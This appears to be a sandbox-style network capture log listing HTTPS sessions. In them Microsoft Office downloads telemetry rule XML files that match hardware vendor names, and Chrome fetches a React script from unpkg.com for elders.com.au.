                                                                                                                                                                                                            Data Ascii: 3cFound. Redirecting to /react@18.3.1/umd/react.development.js
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            66192.168.2.45773613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:47 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                            x-ms-request-id: bbcd7168-d01e-002b-5940-2e25fb000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-15869dbbcc6bdtw9hC1DFWqyfw000000017000000000brkc
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            67192.168.2.45773313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:47 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:47 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                            x-ms-request-id: 65394723-101e-00a2-80f1-2c9f2e000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052947Z-16547b76f7f76p6chC1DFWctqw000000067000000000m3eh
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            68192.168.2.45773513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:47 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                            x-ms-request-id: b9e1ee05-801e-00a0-0660-2e2196000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-17df447cdb5fzdpxhC1DFWdd3400000002cg000000004kp3
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            69192.168.2.45773413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:47 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                            x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-16547b76f7fkcrm9hC1DFWxdag00000006d0000000000tqf
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            70192.168.2.45773713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:47 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                            x-ms-request-id: 7b6e4e7e-601e-0050-245f-2e2c9c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-17df447cdb56j5xmhC1DFWn91800000002bg00000000e5st
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            71192.168.2.45774113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                            x-ms-request-id: 886cc861-d01e-0049-60f4-2ee7dc000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-17df447cdb57srlrhC1DFWwgas00000002eg00000000e22u
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            72192.168.2.45774013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                            x-ms-request-id: a895e1ee-d01e-0028-4b5c-2e7896000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-17df447cdb5t94hvhC1DFWw97800000002kg0000000022c6
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            73192.168.2.45774313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                            x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-16547b76f7fp46ndhC1DFW66zg000000064000000000pznd
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            74192.168.2.45774213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                            x-ms-request-id: a288df0b-b01e-00ab-0601-2ddafd000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052948Z-16547b76f7f4k79zhC1DFWu9y0000000066000000000fd4z
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            75192.168.2.457744104.17.245.2034432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC571OUTGET /react@18.3.1/umd/react.development.js HTTP/1.1
                                                                                                                                                                                                            Host: unpkg.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC577INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
